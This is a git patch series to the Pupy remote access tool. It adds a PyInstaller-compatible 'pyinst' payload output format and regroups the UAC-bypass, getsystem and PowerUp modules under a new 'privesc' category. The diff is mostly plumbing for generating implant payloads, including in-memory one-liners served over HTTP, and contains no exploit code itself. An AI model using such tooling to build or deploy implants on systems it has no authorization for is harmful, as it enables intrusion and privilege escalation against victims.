From 1028cd23a8fb395c7a782cae1c1a6d6817481b41 Mon Sep 17 00:00:00 2001 From: root Date: Wed, 27 Jul 2016 09:22:02 -0400 Subject: [PATCH 1/3] New 'pyinst' output format for making a .py which can be used by pyinstaller --- pupy/conf/imports_done.py | 75 ++++++++++++++++++++++++++++ pupy/pupygen.py | 11 ++-- pupy/pupylib/payloads/py_oneliner.py | 10 +++- 3 files changed, 90 insertions(+), 6 deletions(-) create mode 100644 pupy/conf/imports_done.py diff --git a/pupy/conf/imports_done.py b/pupy/conf/imports_done.py new file mode 100644 index 00000000..aac5a2b6 --- /dev/null +++ b/pupy/conf/imports_done.py @@ -0,0 +1,75 @@ +from collections import OrderedDict +from Crypto.Cipher import AES +from Crypto.Hash import HMAC +from Crypto.Hash import SHA256 +from Crypto.Hash import SHA256, HMAC +from Crypto import Random +from Crypto.Protocol.KDF import PBKDF2 +from Crypto.Util import Counter +from cStringIO import StringIO +from itertools import izip, starmap +from operator import xor +from StringIO import StringIO +from struct import Struct +import argparse +import base64 +import binascii +import bz2 +import code +import collections +import configparser +import copy +import cPickle +import Crypto.Cipher +import Crypto.Cipher.AES +import Crypto.Hash.HMAC +import Crypto.Hash.SHA256 +import Crypto.Util.Counter +import datetime +import errno, stat +import fractions +import __future__ +import getpass +import glob +import hashlib +import hmac +import imp +import importlib +import inspect +import json +import logging +import math +import multiprocessing +import new +import os +import pkgutil +import platform +import Queue +import random +import re +import rsa +import shlex +import shutil +import site +import socket +import SocketServer +import ssl +import string +import StringIO +import struct +import subprocess +import sys +import tempfile +import threading +import time +import traceback +import urllib +import urllib2 +import uuid +import yaml +import zlib +if os.name == 'nt': + import ctypes + import ctypes.wintypes +if os.name == 'posix': + import pty diff --git a/pupy/pupygen.py b/pupy/pupygen.py index 6d5ce2bd..918973b2 100755 --- a/pupy/pupygen.py +++ b/pupy/pupygen.py @@ -7,7 +7,7 @@ import logging, argparse, sys, os.path, re, shlex, random, string, zipfile, tarf from pupylib.utils.network import get_local_ip from pupylib.utils.term import colorize from pupylib.payloads.python_packer import gen_package_pickled_dic -from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload +from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload, getLinuxImportedModules from pupylib.utils.obfuscate import compress_encode_obfs from network.conf import transports, launchers from network.lib.base_launcher import LauncherError @@ -254,7 +254,7 @@ class ListOptions(argparse.Action): print '\n'.join(["\t"+x for x in sc.get_help().split("\n")]) exit() -PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'py_oneliner', 'ps1_oneliner'] +PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1_oneliner'] if __name__=="__main__": if os.path.dirname(__file__): os.chdir(os.path.dirname(__file__)) @@ -331,12 +331,15 @@ if __name__=="__main__": if not outpath: outpath="pupy.apk" get_edit_apk(os.path.join("payload_templates","pupy.apk"), outpath, conf) - elif args.format=="py": + elif args.format=="py" or args.format=="pyinst": + linux_modules = "" if not outpath: outpath="payload.py" + if args.format=="pyinst" : + linux_modules = getLinuxImportedModules() packed_payload=pack_py_payload(get_raw_conf(conf)) with open(outpath, 'wb') as w: - w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+packed_payload) + w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+linux_modules+"\n"+packed_payload) elif args.format=="py_oneliner": packed_payload=pack_py_payload(get_raw_conf(conf)) i=conf["launcher_args"].index("--host")+1 diff --git a/pupy/pupylib/payloads/py_oneliner.py b/pupy/pupylib/payloads/py_oneliner.py index 7c6eb92c..266c2bfa 100644 --- a/pupy/pupylib/payloads/py_oneliner.py +++ b/pupy/pupylib/payloads/py_oneliner.py @@ -13,6 +13,14 @@ from pupylib.payloads.python_packer import get_load_module_code, gen_package_pic ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..","..")) +def getLinuxImportedModules(): + ''' + ''' + lines = "" + with open(os.path.join(ROOT,"conf","imports_done.py")) as f: + lines=f.read() + return lines + def pack_py_payload(conf): print colorize("[+] ","green")+"generating payload ..." fullpayload=[] @@ -74,5 +82,3 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip=""): print 'KeyboardInterrupt received, shutting down the web server' server.socket.close() exit() - - From 2fc505ea6a16cfa749ce462a6afb3ca91c529913 Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Wed, 27 Jul 2016 18:40:41 +0200 Subject: [PATCH 2/3] adding privesc category --- pupy/modules/bypassuac.py | 2 +- pupy/modules/getsystem.py | 2 +- pupy/modules/powerup.py | 4 ++-- pupy/pupylib/conf.py | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/pupy/modules/bypassuac.py b/pupy/modules/bypassuac.py index 3ec5526f..ef3c262c 100644 --- a/pupy/modules/bypassuac.py +++ b/pupy/modules/bypassuac.py @@ -8,7 +8,7 @@ __class_name__="BypassUAC" ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..","..")) -@config(compat="windows", category="exploit") +@config(compat="windows", category="privesc") class BypassUAC(PupyModule): """ try to bypass UAC with Invoke-BypassUAC.ps1, from Empire """ dependencies=["psutil", "pupwinutils.processes"] diff --git a/pupy/modules/getsystem.py b/pupy/modules/getsystem.py index 260af7f9..65a62a55 100644 --- a/pupy/modules/getsystem.py +++ b/pupy/modules/getsystem.py @@ -4,7 +4,7 @@ from pupylib.utils.rpyc_utils import redirected_stdo from modules.lib.windows.migrate import migrate __class_name__="GetSystem" -@config(compat="windows", category="exploit") +@config(compat="windows", category="privesc") class GetSystem(PupyModule): """ try to get NT AUTHORITY SYSTEM privileges """ dependencies=["psutil", "pupwinutils.security"] diff --git a/pupy/modules/powerup.py b/pupy/modules/powerup.py index 7332b680..f81625f6 100644 --- a/pupy/modules/powerup.py +++ b/pupy/modules/powerup.py @@ -6,7 +6,7 @@ from modules.lib.windows.powershell_upload import execute_powershell_script __class_name__="PowerUp" ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..")) -@config(compat="windows", category="admin") +@config(compat="windows", category="privesc") class PowerUp(PupyModule): """ trying common Windows privilege escalation methods""" @@ -23,4 +23,4 @@ class PowerUp(PupyModule): # parse output depending on the PowerUp output output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n") - self.success("%s" % output) \ No newline at end of file + self.success("%s" % output) diff --git a/pupy/pupylib/conf.py b/pupy/pupylib/conf.py index af5e5dfc..1fb55732 100644 --- a/pupy/pupylib/conf.py +++ b/pupy/pupylib/conf.py @@ -4,5 +4,5 @@ # Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms #authorized categories -categories=["general", "manage", "admin", "exploit", "network", "gather", "troll", "misc"] +categories=["general", "manage", "admin", "exploit", "privesc", "network", "gather", "troll", "misc"] From 1a0bd4e2404e125bf6e55605b8264195b6301839 Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Wed, 27 Jul 2016 18:44:51 +0200 Subject: [PATCH 3/3] adding help for pyinst new format --- pupy/pupygen.py | 1 + 1 file changed, 1 insertion(+) diff --git a/pupy/pupygen.py b/pupy/pupygen.py index 918973b2..ddbc668f 100755 --- a/pupy/pupygen.py +++ b/pupy/pupygen.py @@ -236,6 +236,7 @@ class ListOptions(argparse.Action): print "\t- exe_86, exe_x64 : generate PE exe for windows" print "\t- dll_86, dll_x64 : generate reflective dll for windows" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" + print "\t- pyinst : generate a python file compatible with pyinstaller" print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line." print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell."